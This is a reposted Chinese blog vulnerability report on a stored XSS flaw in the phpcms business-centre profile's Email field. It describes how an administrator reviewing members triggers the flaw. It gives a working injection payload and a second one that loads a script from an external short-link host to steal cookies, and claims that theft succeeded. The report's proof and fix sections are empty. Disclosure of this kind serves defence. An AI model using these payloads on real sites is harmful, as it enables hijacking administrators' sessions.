zoukankan      html  css  js  c++  java
  • phpcms某处储存型XSS(demo+本地演示)

    详细说明:

    demo+本地演示



    存在XSS的地方在商务中心的商家资料的我的资料的Email那里(这句话好绕口。。),属于过滤不严格随便插字符的问题,我直接在Email那里写上"/><svg onload=alert(/1/)>可以看到是正确的



    然后点击提交可以看到说操作成功



    然后来到我们的企业首页查看可以看到成功弹窗

     



    再查看下源代码,可以看到是储存型的



    本来想去后台查看的,但是无奈demo不提供后台演示,只好本地搭建看看了,本地搭建好了以后来到后台查看是不能直接打后台的,但是管理员审核会员的时候会到会员的企业查看,这个时候可以看到成功弹窗

     



    然后继续构造:"/><script src=http://t.cn/Rz4Oi2b></script>,提交后看看能不能打cookie



    可以看到已经成功打到cookie~

    漏洞证明:

    修复方案:

  • 相关阅读:
    C语言寒假大作战04
    C语言寒假大作战03
    C语言寒假大作战02
    C语言寒假大作战01
    C语言I作业12—学期总结
    C语言I博客作业11
    C语言I博客作业10
    C语言I博客作业09
    C语言I博客作业08
    c语言||作业01
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154704.html
Copyright © 2011-2022 走看看